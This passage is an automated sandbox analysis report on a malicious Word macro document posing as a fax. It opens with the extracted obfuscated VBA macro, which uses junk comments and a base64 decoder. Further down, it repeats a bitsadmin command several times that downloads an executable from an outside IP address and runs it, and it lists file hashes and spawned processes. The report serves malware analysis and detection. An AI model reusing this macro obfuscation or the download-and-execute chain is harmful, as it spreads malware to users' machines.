v335244 = "CWJ9vAgSyr52WbXtI278AXLk3RPATJ6AkNVnIp8AymgG4EDXh5AhgZz9hAFP87xAuovrxr8NkDuvOST0Ldu9JjlDuFcANaP183a8rdUuTBOUtwm6A9XGrYvtDX7x5bhpirPaSl8aSWFv24fk1K5hJlEj2TIpNjXfyKWVpdxRQ7hcsfVLTDY6CGSg3sG4tIm90NB1XovSxBa6C8gcgtq6GDWkL"
v668744 = "Jhlk3JfDkGkvuoiSJQuIiYhXTW94X6xzKhFkuHhF7Kem2PzLbQABDIFPAlmGb6Gr7Dlur28AmYhEg0Q2onfbasnrwJmm4LSJSrwhSqdI7LtcSj6SOUV8qOXQLesefEk"
v269444 = "91"
v376987 = "27"
v330126 = "50"
v842208 = "31"
v216871 = "60"
v330126 = v842208 - v269444
v216871 = v269444 - v269444
'Veniam culpa tempor duis laborum cillum aute excepteur mollit culpa.
v376987 = v216871 + v842208
'Consequat in velit nostrud sit commodo ut enim. Fugiat laborum do veniam reprehenderit consectetur ullamco et nisi in quis.
Dim v814889 As String
'Exercitation aute anim in pariatur veniam laboris quis. Labore est officia id voluptate nisi fugiat reprehenderit cupidatat quis aute.
v269444 = v269444 + v842208
'Magna elit reprehenderit cillum et nulla eiusmod eiusmod. Magna eiusmod dolore amet laboris pariatur sunt anim reprehenderit anim qui fugiat.
v814889 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim v709711
Dim v272008
v842208 = Tan(v269444)
v330126 = v842208 + v330126
'Ad sit anim magna nulla. Ipsum magna id aliqua est culpa excepteur officia et dolor et et.
v269444 = v269444 + v330126
v330126 = v269444 - v376987
Dim v776342, v754466
Dim v442221, v234125, v97083, v875027
Dim v861160, v452150, Byte3
'Fugiat labore do elit eu.
v216871 = Sqr(v330126)
'Nisi quis est ea eu culpa eiusmod reprehenderit cupidatat nisi.
If Len(v100243) Mod 4 > 0 Then v100243 = v100243 & String(4 - (Len(v100243) Mod 4), " ")
v709711 = ""
v376987 = v216871 + v216871
'Est aute est mollit fugiat ut ex ut esse culpa.
v376987 = v216871 + v269444
v376987 = v216871 + v269444
For v272008 = 1 To Len(v100243) Step 4
v754466 = ""
v776342 = Mid(v100243, v272008, 4)
'Ipsum adipisicing amet duis eiusmod est anim veniam nisi eu nostrud. Et ea elit cillum pariatur amet fugiat sit minim elit ut dolore dolore.
v376987 = Abs(v216871)
'Incididunt sunt occaecat fugiat mollit do.
'Incididunt duis magna est eu ad qui labore ipsum dolore ullamco nisi eu dolor.
v442221 = InStr(v814889, Mid(v776342, 1, 1)) - 1
v234125 = InStr(v814889, Mid(v776342, 2, 1)) - 1
v216871 = v330126 + v216871
'Cillum officia ea aliquip duis minim qui.
v376987 = v842208 + v376987
v330126 = v330126 + v269444
'Nulla ut consequat ut ipsum in deserunt culpa velit minim cillum id. Non officia ipsum ad officia ullamco fugiat duis enim Lorem et enim.
v97083 = InStr(v814889, Mid(v776342, 3, 1)) - 1
v875027 = InStr(v814889, Mid(v776342, 4, 1)) - 1
v861160 = Chr(((v234125 And 48) \ 16) Or (v442221 * 4) And &HFF)
v452150 = v754466 & Chr(((v97083 And 60) \ 4) Or (v234125 * 16) And &HFF)
'Voluptate quis magna do ipsum sunt ad sunt excepteur dolore laboris consequat magna mollit. Cupidatat cillum laborum laboris amet ex amet ad adipisicing.
'Nisi ipsum officia do eiusmod.
v376987 = Tan(v842208)
v216871 = v842208 - v269444
Byte3 = Chr((((v97083 And 3) * 64) And &HFF) Or (v875027 And 63))
v754466 = v861160 & v452150 & Byte3
'Ad ut adipisicing culpa aute non occaecat incididunt quis ex ut ad eu. Lorem in laboris ea laborum aute est culpa incididunt quis duis officia laborum dolor nostrud.
v216871 = v842208 - v842208
'Nulla anim ad culpa ea. Esse enim irure ea Lorem ut magna amet duis.
'Lorem et occaecat dolore velit et. Sit aliqua fugiat cupidatat sunt aliqua fugiat et tempor aute.
v842208 = Int(v216871)
v709711 = v709711 + v754466
Next
v842208 = v330126 + v216871
v216871 = v216871 + v330126
v330126 = v269444 + v216871
'Do Lorem adipisicing duis eu in sint excepteur ipsum eu quis excepteur consequat. Fugiat et aliqua tempor eiusmod esse pariatur consectetur amet tempor exercitation laborum deserunt irure.
'Nulla excepteur nulla consequat laborum fugiat nulla do aliquip pariatur commodo eiusmod ex.
f245997 = Left(v709711, Len(v709711) - 1)
End Function
Function f624191() As Long
On Error Resume Next
Dim v589425 As String, v942571 As String, v88596 As Variant, v92129 As Variant, v364689 As String, v711536 As Variant, v536710 As Variant, Var_5 As Variant
v942571 = "EgZKyNWnCPmGF9QUWtnsjpaO96BrRkRifJicfZzfnL2jBX3A0Vt1r1ZFRzTRSns0V8HpvYYE3F9trjomUzT1djxO1SbWFNg349CvHmoOifF3NCWREkZ85SXR7umpdBgPZKQQXDVh4HQBXxJVUCERoleJRbIBhD6pzX5J2h8eyatF5QzuuK1AnpJv9iw5K5H3gLn7sgC1AooZdIvOOigWbqswUCCC3rKdYdoLDBvhAgtQ8l85AlSfSBHCcII6pbaeICyRVhPZZ3FLQJwePyjiKuXSkj7NZXR8nusLIuK5ufHbQ1dFW80X7VyV8ZXEe0iGHZ0JErHa2pzkI8k8RJLzK7jT2Xeagk"
v589425 = "bLNvyNY2cc1ahUXBInXeePR5PxJmPikDpOrmy91d0cAjgBWo3FZ4uhvY4wn2ZQCn3UGKkkjqRc3oIi8fKDhgYSPscXeOdyW2bxJoevWeQyJp1FFC889c3oukDV444yoViRhW4qlHtDpPvOzyczQj4sisuRNBQ7SugnDBGRq0mosvWHfXmegc9RQFygzG6PmHi94Ow3aaUwhsaFcBC7pWR5DVg1lpTX4XIbwNy8Q7XnbH5Vytj41avGbbGrQSHS2qISQmETHf7PxvGJ1ONpaVuffxmqH0S2jjTurEEgUKEjViyOmd8RxCY0WUHPrbAKQjtvVRmoQTCmuh7WKPvP7bhSBIXLUeepgrwoCve0w0mix14HWkd25dDLsHUAoTylma1UtHxxdNEJ78ltQQGgc6a5rxit"
v364689 = "ZtfYBoTlYuZ3ZHAOBm67PzsT0dinL7YGdgglueNslcQsir7C6Q5YFeFwN5bCyb20KtHAg4uhVm9WRtT2okJpdIa4uFLmwz2etdfsER0friGemY3lLD5YQB8Ns7RJXxpU0esKKs7qsBXjIFNUNNRb8"
v536710 = "97"
v711536 = "32"
v88596 = "10"
v92129 = "21"
v647557 = "42"
'Officia eu id eu cupidatat duis aliquip. Commodo deserunt anim officia excepteur id excepteur enim ut sint ut ut excepteur aliquip voluptate.
v92129 = v536710 - v647557
v536710 = v536710 + v92129
f624191 = 1
End Function"
- source
- Static Parser
- relevance
- 10/10
-
Creates a writable file in a temporary directory
- details
- "WINWORD.EXE" created file "%TEMP%\~DF4B30B65BF4E6A9A3.TMP"
- source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
- source
- Created Mutant
- relevance
- 3/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 68AB0000
- source
- Loaded Module
-
Logged script engine calls
- details
- "WINWORD.EXE" called ".Shell" with result: "1" ...
- source
- API Call
- relevance
- 10/10
-
Process launched with changed environment
- details
- Process "cmd.exe" was launched with new environment variables: "WecVersionForRosebud.C00="4""
- source
- Monitored Target
- relevance
- 10/10
-
Runs shell commands
- details
- "/c bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%/1.exe &bitsadmin /create /download j2 &bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%/1.txt &bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0 &bitsadmin /resume j2 &bitsadmin /complete j2 && start %TEMP%/1.exe" on 2017-12-7.16:37:02.781
- source
- Monitored Target
- relevance
- 5/10
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "mspim_wnd32"
"WINWORD.EXE" searching for class "NetUICtrlNotifySink"
"WINWORD.EXE" searching for class "REListbox20W"
"WINWORD.EXE" searching for class "OfficeTooltip"
"WINWORD.EXE" searching for class "MsoCommandBarPopup"
"WINWORD.EXE" searching for class "MSOBALLOON"
"WINWORD.EXE" searching for class "MsoHelp10"
"WINWORD.EXE" searching for class "AgentAnim"
- source
- API Call
- relevance
- 10/10
-
Spawns new processes
- details
-
Spawned process "cmd.exe" with commandline "/c bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%/1.exe &bitsadmin /create /download j2 &bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%/1.txt &bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0 &bitsadmin /resume j2 &bitsadmin /complete j2 && start %TEMP%/1.exe"
Spawned process "bitsadmin.exe" with commandline "bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%\1.exe"
Spawned process "bitsadmin.exe" with commandline "bitsadmin /create /download j2"
Spawned process "bitsadmin.exe" with commandline "bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%\1.txt"
Spawned process "bitsadmin.exe" with commandline "bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0"
Spawned process "bitsadmin.exe" with commandline "bitsadmin /resume j2"
Spawned process "bitsadmin.exe" with commandline "bitsadmin /complete j2"
- source
- Monitored Target
- relevance
- 3/10
-
Installation/Persistence
-
Creates new processes
- details
- "WINWORD.EXE" is creating a new process (Name: "%WINDIR%\System32\cmd.exe", Handle: 1288)
- source
- API Call
- relevance
- 8/10
-
Dropped files
- details
-
"b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Thu Dec 7 23:35:52 2017 mtime=Thu Dec 7 23:35:52 2017 atime=Thu Dec 7 23:36:10 2017 length=181248 window=hide"
"~$644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc" has type "data"
"urlref_http185.81.113.106L33LMj7.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"index.dat" has type "data"
"~WRS{70621F97-B98F-44BB-BE39-FADAA03A35C7}.tmp" has type "data"
"~$Normal.dotm" has type "data"
- source
- Binary File
- relevance
- 3/10
-
Opens the MountPointManager (often used to detect additional infection locations)
- details
- "WINWORD.EXE" opened "\Device\MountPointManager"
- source
- API Call
- relevance
- 5/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "C:\Windows\AppPatch\sysmain.sdb"
"WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\StaticCache.dat"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\user32.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\setupapi.dll.mui"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db"
"WINWORD.EXE" touched file "C:\Windows\System32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
- source
- API Call
- relevance
- 7/10
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Pattern match: "http://185.81.113.106/indexsdfgfdsafdefsdd.php"
Pattern match: "http://185.81.113.106/L33LMj7.exe"
- source
- File/Memory
- relevance
- 10/10
-
System Security
-
Hooks API calls
- details
-
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
- source
- Hook Detection
- relevance
- 10/10
-
Queries sensitive IE security settings
- details
- "WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
- source
- Registry Access
- relevance
- 8/10
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
- source
- Hook Detection
- relevance
- 10/10
-
Reads information about supported languages
- details
-
- source
- Registry Access
- relevance
- 3/10
File Details
fax-120717_094384372834792.doc
- Filename
- fax-120717_094384372834792.doc
- Size
- 177KiB (181248 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: adm, Template: Normal.dotm, Last Saved By: adm, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 07:00, Create Time/Date: Thu Sep 28 14:04:00 2017, Last Saved Time/Date: Wed Sep 27 14:54:00 2017, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
- Architecture
- WINDOWS
- SHA256
- b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17
- MD5
- 9707cbff1947e82bc5cbf6de5d0eb880
- SHA1
- 298ca21d039307d977791d47b6eeb8e0dcddf7a2
Classification (TrID)
- 54.2% (.DOC) Microsoft Word document
- 32.2% (.DOC) Microsoft Word document (old ver.)
- 13.5% (.) Generic OLE2 / Multistream Compound File
Hybrid Analysis
Analysed 8 processes in total (System Resource Monitor).
-
WINWORD.EXE
/n "C:\b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc"
(PID: 3072)
-
cmd.exe
/c bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%/1.exe &bitsadmin /create /download j2 &bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%/1.txt &bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0 &bitsadmin /resume j2 &bitsadmin /complete j2 && start %TEMP%/1.exe
(PID: 3768)
- bitsadmin.exe bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%\1.exe (PID: 3728)
- bitsadmin.exe bitsadmin /create /download j2 (PID: 3808)
- bitsadmin.exe bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%\1.txt (PID: 3848)
- bitsadmin.exe bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0 (PID: 3868)
- bitsadmin.exe bitsadmin /resume j2 (PID: 3936)
- bitsadmin.exe bitsadmin /complete j2 (PID: 1512)
Network Analysis
DNS Requests
No relevant DNS requests were made.
Contacted Hosts
No relevant hosts were contacted.
HTTP Traffic
No relevant HTTP requests were made.
Extracted Strings
Extracted Files
-
Malicious 1
-
-
urlref_http185.81.113.106L33LMj7.exe
- Size
- 64KiB (65536 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- AV Scan Result
- Labeled as "QVM03.0.B013.Malware" (6/65)
- Context
- http://185.81.113.106/L33LMj7.exe
- MD5
- 5b0e06e3e896d541264a03abef5f30c7
- SHA1
- d4bb230f93c4b3982f4d56d698533d0b85ccb07e
- SHA256
- 48dc488125a342d278aee48cdf3069baf8743e035a5e1b33e2f253cb786a786d
-
-
Informative 5
-
-
b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.LNK
- Size
- 733B (733 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Dec 7 23:35:52 2017, mtime=Thu Dec 7 23:35:52 2017, atime=Thu Dec 7 23:36:10 2017, length=181248, window=hide
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 7f497955d1de7de9b083668c30996259
- SHA1
- eb2d2f848f0fb194ca7ab651d30637b2f9fa38fd
- SHA256
- 68d998562e2ad5d3cc4c74d2f610f712aed0231b44dcd18ea9cb5514b529b7cb
-
index.dat
- Size
- 257B (257 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- cb5b91d14af602b02bb39c0078c18cc2
- SHA1
- cbe5426e35b333e044d6edea42fec77abaeb3f0b
- SHA256
- c402b8881f86d3f31973edc93ae76f3586601b025aa4bf2fe7f59e0d6652af72
-
~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 73fb0c9920d73c23284d77feb3172218
- SHA1
- 29b553daa73a0bb2cd1889f8793fcbfa1844bcc6
- SHA256
- 7a00d1a381743ff56f7ca883b82498e0873d1650caf8b99cd58959ad080e8504
-
~WRS{70621F97-B98F-44BB-BE39-FADAA03A35C7}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
~$644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 73fb0c9920d73c23284d77feb3172218
- SHA1
- 29b553daa73a0bb2cd1889f8793fcbfa1844bcc6
- SHA256
- 7a00d1a381743ff56f7ca883b82498e0873d1650caf8b99cd58959ad080e8504
-
Notifications
-
Runtime
- Added comment to Virus Total report
- Extracted file "~$644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/7a00d1a381743ff56f7ca883b82498e0873d1650caf8b99cd58959ad080e8504/analysis/1512661552/")
- Not all sources for signature ID "api-55" are available in the report
- Not all sources for signature ID "hooks-8" are available in the report
- Not all sources for signature ID "mutant-0" are available in the report
- Not all sources for signature ID "registry-1" are available in the report
- Not all sources for signature ID "registry-25" are available in the report
- Not all sources for signature ID "registry-55" are available in the report